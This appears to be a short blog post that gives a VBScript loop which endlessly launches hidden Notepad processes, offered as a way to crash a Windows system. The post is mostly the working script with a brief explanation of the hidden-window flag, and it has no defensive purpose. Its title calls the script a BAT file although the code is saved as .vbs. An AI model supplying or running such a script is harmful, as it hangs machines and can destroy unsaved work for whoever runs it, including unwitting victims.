Crash System Using BAT file



Crash System
 
1]Crash System
Open notepad type the following and save it as anyname.vbs
============================================================
set ws=CreateObject(“wscript.shell”)
do
ws.run “notepad”,0
loop
============================================================
This program will infinitely open notepad in hidden mode causing your
system to crash…!
the value “0″ in the third line specifies the mode in which the application
should run here it is hidden mode.

Comments

Popular posts from this blog

How to prepare your PC for the Windows 10 upgrade Source: WC

Top 5 Japanese Anime (Cartoons)

Salesforce LWC - Mass Approval Component